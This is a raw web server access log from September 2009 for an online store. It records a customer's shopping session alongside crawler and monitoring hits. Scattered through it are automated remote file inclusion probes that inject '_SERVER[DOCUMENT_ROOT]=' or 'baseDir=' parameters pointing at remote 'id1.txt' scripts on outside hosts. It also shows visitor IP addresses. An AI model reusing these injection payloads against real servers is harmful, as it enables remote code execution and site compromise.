98.195.56.213 - - [23/Sep/2009:00:06:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211324460F58200019A7019+M37+ENG HTTP/1.1" 200 59851 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113234B05B87000D667019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
67.225.196.53 - - [23/Sep/2009:00:08:01 -0400] "GET /logs/access_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.emailzahler.de//images/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:08:51 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113244F0AB880001607019+M37+ENG HTTP/1.1" 200 45227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
67.225.196.53 - - [23/Sep/2009:00:09:02 -0400] "GET /logs/access_log.Q109080200////?_SERVER[DOCUMENT_ROOT]=http://www.hachon.co.kr/bbs/icon/member_image_box/1/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:09:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113244E00A890009917019+M37+ENG HTTP/1.1" 200 45225 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113244F0AB880001607019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
67.225.196.53 - - [23/Sep/2009:00:09:14 -0400] "GET /logs/access_log.Q109080200////?_SERVER[DOCUMENT_ROOT]=http://www.hachon.co.kr/bbs/icon/member_image_box/1/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:09:26 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211324410D38D000BE17019+M37+ENG HTTP/1.1" 200 45227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:09:33 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211324400938B000C627019+M37+ENG HTTP/1.1" 200 45227 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211324410D38D000BE17019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:09:40 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211324460C886000C2F7019+M37+ENG HTTP/1.1" 200 45227 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211324400938B000C627019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:09:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113244E09181000C307019+M37+ENG HTTP/1.1" 200 59852 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211324460C886000C2F7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [23/Sep/2009:00:11:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.225.196.53 - - [23/Sep/2009:00:11:25 -0400] "GET /logs/access_log.Q109080200////?_SERVER[DOCUMENT_ROOT]=http://www.emailzahler.de//images/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.202.2.220 - - [23/Sep/2009:00:12:51 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
211.202.2.220 - - [23/Sep/2009:00:12:51 -0400] "GET /logs/access_log.Q109062000////?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.202.2.220 - - [23/Sep/2009:00:12:51 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 200 18979 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:13:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113244906188000D187019+M37+ENG HTTP/1.1" 200 77314 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:13:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113244906188000D187019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:13:28 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113244906188000D187019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:13:28 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113244906188000D187019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:13:28 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113244906188000D187019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:13:31 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113244906188000D187019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:13:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211325440F68D000AF97019+M37+ENG HTTP/1.1" 200 68334 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113244906188000D187019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:13:40 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211325440F68D000AF97019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:13:40 -0400] "GET /images/addtocart.gif HTTP/1.1" 200 591 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211325440F68D000AF97019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:13:40 -0400] "GET /images/fav_a-a.gif HTTP/1.1" 200 281 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211325440F68D000AF97019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:13:40 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211325440F68D000AF97019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:13:40 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211325440F68D000AF97019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.249.68.151 - - [23/Sep/2009:00:12:54 -0400] "GET /logs/access_log.Q109051200 HTTP/1.1" 200 6040641 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
98.195.56.213 - - [23/Sep/2009:00:14:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211325440F68D000AF97019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:14:12 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113254F01981000A3A7019+M37+ENG HTTP/1.1" 200 47040 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211325440F68D000AF97019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:15:26 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113254002582000DD87019+M37+ENG HTTP/1.1" 200 47015 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113254F01981000A3A7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
211.47.71.89 - - [23/Sep/2009:00:15:32 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.125.66.82 - - [23/Sep/2009:00:15:53 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
98.195.56.213 - - [23/Sep/2009:00:16:20 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211326470D4800001B47019+M37+ENG HTTP/1.1" 200 45202 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113254002582000DD87019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:16:34 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211326490308A00041D7019+M37+ENG HTTP/1.1" 200 44312 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211326470D4800001B47019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:16:43 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211326480E98B0005657019+M37+ENG HTTP/1.1" 200 77314 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
204.15.230.189 - - [23/Sep/2009:00:17:46 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:00:17:46 -0400] "GET /logs/access_log.Q109081400%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:00:17:46 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:00:17:46 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:00:17:46 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:00:17:46 -0400] "GET /logs/access_log.Q109081400%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:18:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211326400AF8100060F7019+M37+ENG HTTP/1.1" 200 47040 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211326480E98B0005657019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
204.15.230.189 - - [23/Sep/2009:00:18:37 -0400] "GET /logs/error_log.Q109081400%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:00:18:39 -0400] "GET /logs/error_log.Q109081400%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:19:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113264201483000C1B7019+M37+ENG HTTP/1.1" 200 44317 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211326400AF8100060F7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
220.181.7.64 - - [23/Sep/2009:00:19:11 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.47.71.89 - - [23/Sep/2009:00:19:16 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:19:17 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211326440728F000EB77019+M37+ENG HTTP/1.1" 200 44312 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113264201483000C1B7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:19:23 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113264307482000F617019+M37+ENG HTTP/1.1" 200 44312 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211326440728F000EB77019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:19:35 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113264909D89000F6B7019+M37+ENG HTTP/1.1" 200 44312 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:19:42 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113274302B8D0000697019+M37+ENG HTTP/1.1" 200 77314 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113264909D89000F6B7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
61.100.5.136 - - [23/Sep/2009:00:19:51 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:19:51 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 200 18972 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:00:20:01 -0400] "GET /logs/access_log.Q109091200/?_SERVER[DOCUMENT_ROOT]=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:20:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113274A0D28B00001F7019+M37+ENG HTTP/1.1" 200 47022 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113274302B8D0000697019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
211.39.130.24 - - [23/Sep/2009:00:20:19 -0400] "GET /logs/access_log.Q109091500//standalone/stubjambo.php?baseDir=http://www.vistablack.com//edit/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:00:20:19 -0400] "GET /logs//standalone/stubjambo.php?baseDir=http://www.vistablack.com//edit/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:00:20:19 -0400] "GET //standalone/stubjambo.php?baseDir=http://www.vistablack.com//edit/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.39.130.24 - - [23/Sep/2009:00:20:27 -0400] "GET /logs/access_log.Q109083000//standalone/stubjambo.php?baseDir=http://www.vistablack.com//edit/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:20:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113274D03B840002927019+M37+ENG HTTP/1.1" 200 47024 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113274A0D28B00001F7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:20:55 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211327450AE840004897019+M37+ENG HTTP/1.1" 200 47562 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113274D03B840002927019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:21:24 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211327400FB8C0005EF7019+M37+ENG HTTP/1.1" 200 47024 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211327450AE840004897019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:21:51 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113274C00A820006427019+M37+ENG HTTP/1.1" 200 45230 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211327400FB8C0005EF7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:23:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211327450458D00085C7019+M37+ENG HTTP/1.1" 200 45225 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113274C00A820006427019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:24:04 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211327410A78D000E0E7019+M37+ENG HTTP/1.1" 200 45225 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211327450458D00085C7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
204.15.230.189 - - [23/Sep/2009:00:24:23 -0400] "GET /logs/access_log.Q109081400///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:00:24:26 -0400] "GET /logs/access_log.Q109081400///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:00:24:32 -0400] "GET /logs/access_log.Q109091100///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
204.15.230.189 - - [23/Sep/2009:00:24:36 -0400] "GET /logs/access_log.Q109091100///index.php?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:24:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2113284507A870000A67019+M37+ENG HTTP/1.1" 200 59852 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L211327410A78D000E0E7019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:24:40 -0400] "GET /images/AMEX.GIF HTTP/1.1" 200 2378 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113284507A870000A67019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:24:40 -0400] "GET /images/DISCOVER.GIF HTTP/1.1" 200 2579 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113284507A870000A67019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:24:40 -0400] "GET /images/bt_cal-a.gif HTTP/1.1" 200 504 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113284507A870000A67019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:24:40 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113284507A870000A67019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:24:40 -0400] "GET /images/MCARD.GIF HTTP/1.1" 200 2789 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113284507A870000A67019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:24:40 -0400] "GET /images/VISA.GIF HTTP/1.1" 200 2800 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2113284507A870000A67019+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
211.39.130.24 - - [23/Sep/2009:00:25:26 -0400] "GET /logs/access_log.Q109091500%20%20//standalone/stubjambo.php?baseDir=http://www.vistablack.com//edit/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
98.195.56.213 - - [23/Sep/2009:00:25:29 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L211328450338E0002EA7019+M37+ENG HTTP/1.1" 200 45225 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
